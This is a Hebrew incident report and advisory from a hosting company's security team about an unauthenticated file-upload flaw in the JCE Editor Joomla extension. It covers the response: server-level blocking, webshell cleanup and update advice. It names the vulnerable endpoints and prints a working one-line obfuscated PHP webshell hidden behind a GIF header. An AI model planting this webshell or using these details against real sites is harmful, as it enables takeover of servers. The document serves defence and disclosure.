פורסם על-ידי צוות ה- cyber של SPD Hosting | יוני 2026
הקדמה
לפני כמה ימים, ב-5 ביוני 2026, פורסמה פרצת אבטחה חמורה בתוסף פופולרי ל-Joomla עבור JCE Editor.
למקור הרשמי – https://www.joomlacontenteditor.net/news
תוך שעות ספורות מהפרסום, תוקפים כבר ניסו לנצל אותה באתרים בישראל ובעולם. חלק מהם הצליחו.
הסיפור הזה הוא על מה שקרה, איך זיהינו אותו, מה עשינו – ומה אתם צריכים לעשות עכשיו.
מה זו פרצת CVE-2026-48907?
JCE Editor (Joomla Content Editor) הוא אחד מתוספי העריכה הנפוצים ביותר לאתרי ג'ומלה.
מותקן על מאות אלפי אתרים ברחבי העולם, כולל רבים מהאתרים שאנחנו מנהלים.
ב-5 ביוני התגלה שגיאת אבטחה קריטית בכל גרסאות ה-JCE מתחת ל-2.9.99.5, ציון ה-CVSS של הפרצה הוא 10.0 – המקסימום האפשרי,
המשמעות הפרקטית: תוקף לא מזוהה, ללא שם משתמש וללא סיסמה, יכול לבצע הרצה של קוד על השרת.
איך זה עובד טכנית?
ה-JCE Editor חושף ממשק לניהול קבצים – דבר שימושי למנהלי תוכן, אבל מסוכן כשאין עליו הגנה מספקת.
הפרצה מאפשרת לתוקף לשלוח בקשה מעוצבת במיוחד לאחד משני נתיבים:
components/com_jce/...profiles.importcomponents/com_jce/...plugin.rpc/browser
בתגובה לבקשה הזו, ה-JCE מסכים להעלות קובץ – ולא בודק אותו כראוי.
התוקף מעלה קובץ שנראה תמים (כמו s1749584423.php.gif) אבל בתוכו יש שורת קוד PHP אחת שמספיקה:
מה שמכונה webshell – דלת אחורית שמאפשרת שליחת פקודות לשרת דרך הדפדפן.
GIF89a
<?php $a="sys"."tem"; $a($_GET[x]); ?>זהו. 40 תווים. גישה מלאה למשתמש על השרת.
מה ראינו בשטח
ה-Timeline
הפרצה פורסמה ב-5 ביוני בשעות הצהריים. כארבע שעות מאוחר יותר הופיע PoC (קוד הוכחת ניצול) ב-GitHub.
מאותו רגע, הסריקות האוטומטיות התחילו.
בתוך שעות ספורות, שרתים של SPD החלו לקבל בקשות זדוניות.
הצוות שלנו זיהה פעילות חריגה דרך מערכות ה-SNOC, ועברנו למצב תגובה מיידית.
מה מצאנו
על פני מספר שרתים שניהלנו, מצאנו:
- אתרי ג'ומלה רבים שהריצו גרסאות ישנות של JCE — חלקן מ-2018.
- מספר אתרים שבהם webshells כבר הונחו בהצלחה לפני שהגענו.
- פעילות C2 (Command & Control) – כלומר, התוקף לא רק הניח את הדלת האחורית,
הוא גם ניסה להשתמש בה.
דפוס ההתקפה היה עקבי:
- ארבעה עד שמונה כתובות IP שונות סרקו את האתרים בצורה מסודרת.
- כל webshell קיבל שם עם חותמת זמן (epoch timestamp) כדי להימנע מזיהוי על-ידי סריקות פשוטות.
- התוקפים ניסו לנקות את עקבותיהם אחרי השימוש.
מה עשה צוות SPD
שלב 1: זיהוי וסיווג מהיר
ברגע שהתקבלה ההתרעה, התחלנו במיפוי מלא:
אילו שרתים מנהלים אתרי ג'ומלה? אילו מהם מריצים JCE? באיזו גרסה?
מערכות ההתראה שלנו מזהות פעילות המסווגת כקשורה לחולשה הזאת,
ומסמנת לצוותים שלנו לבודד את הפעילות, ולהגיב בהתאם
שלב 2: הכלה מיידית ברמת השרת
לפני ביצוע העדכונים ע"י הלקוחות – שלוקח זמן – פרסנו חסימה ברמת Apache:
כל בקשה שמגיעה לנתיבים הפגיעים של ה-JCE נחסמת ומחזירה שגיאת 403,
על כל האתרים בשרת, בלי לפגוע בפונקציונליות של האתר עצמו.
זה נתן לנו חלון עבודה בטוח לשלב הבא.
שלב 3: ניקוי פעיל של אתרים שנפגעו
על אתרים שזוהו כנפגעים:
- הרצנו חיפוש ממוקד אחר קבצים חשודים לפי דפוס השם הידוע.
- שמרנו את כל ה-Evidance (hash, מיקום, תוכן) לפני הסרה.
- הסרנו את ה-webshells.
- חסמנו את כתובות ה-IP של התוקפים ברמת הפיירוול.
- בדקנו את טבלאות מסד-הנתונים לאיתור שינויים זדוניים בפרופילים של ה-JCE.
שלב 4: באחריות הלקוח –
שלחנו עדכונים ללקוחות על מנת שייעדכנו את JCE לגרסה 2.9.99.5 ומעלה על כל האתרים הפגיעים שניתן לעדכן.
שלב 5: וידוא ותיעוד
כל אתר עבר בדיקת curl אוטומטית שניסתה לשחזר את וקטור ההתקפה ווידאה שהוא חסום. התוצאות תועדו.
מה אתם צריכים לעשות?
אם יש לכם אתר ג'ומלה – עם JCE Editor מותקן – הנה הפעולות הנדרשות:
🔴 דחוף — עכשיו
עדכנו את JCE Editor לגרסה 2.9.99.5 ומעלה.
כנסו ל-Extensions → Update בממשק האדמין של ג'ומלה ובצעו עדכון. זהו הצעד הקריטי.
🟡 ביום-יומיים הקרובים
בדקו אם יש קבצים חשודים בתיקיית ה-uploads ובתיקיות ה-JCE. חפשו קבצים בפורמט s[מספרים].php.gif – אלו סימן מובהק לניסיון פגיעה.
בדקו את לוגי הגישה. אם אתם מנהלים בעצמכם את השרת, חפשו בקשות POST לנתיבים המכילים com_jce ו-profiles.import או plugin.rpc.
🟢 לטווח ארוך
- הגדירו התראות אוטומטיות לכל שינוי בתיקיות רגישות.
- וודאו שמדיניות העדכון שלכם מכסה גם תוספים של צד שלישי – לא רק גרסאות ג'ומלה core.
- שקלו הגבלת גישה לממשקי הניהול לפי IP.
מה לקחנו מהאירוע הזה
המהירות של התוקפים השתנתה
פעם, לוקח היה שבועות עד שתוקפים מנצלים פרצה שפורסמה.
כיום, עם AI ו-GitHub, יש PoC פונקציונלי תוך שעות – ועוד כמה שעות לאחר מכן ההתקפות כבר בשיא.
החלון בין פרסום לניצול מסחרי קצר ממה שרוב בעלי אתרים חושבים.
תוספי צד שלישי הם משטח התקפה לא מנוהל
ג'ומלה core יכולה להיות מעודכנת לחלוטין – אבל תוסף אחד ישן מספיק לפתוח פרצה גדולה.
JCE בגרסה מ-2018 על אתר שנמצא ב-Production ב-2026 הוא בדיוק הסוג של בעיה שנפל עליה האירוע הזה.
שכבת ה-Web Server היא קו ההגנה המהיר ביותר
כשאי-אפשר לעדכן תוסף מיד (אתרי legacy, ספקים שלא זמינים, בדיקות נדרשות),
חסימה ברמת apache מנקודת הממשק הפגיע נותנת זמן תגובה – בלי להפיל את האתר.
סיכום
CVE-2026-48907 הוא תזכורת שהאינטרנט הוא סביבה עוינת, והגנה דורשת ערנות תמידית – לא רק בזמן אירוע.
צוות SPD מנטר, מגיב ומטפל כדי שתוכלו לישון בשקט. אבל גם לכם יש תפקיד: עדכנו, בדקו, ואל תניחו שמשהו "טוב מספיק" כי עבד עד עכשיו.
אם יש לכם שאלות, רוצים שנבדוק אתר ספציפי, או שאתם עדיין בחוסר ודאות – פנו אלינו. אנחנו כאן.
צוות אבטחת המידע – SPD Hosting security@spd.co.il
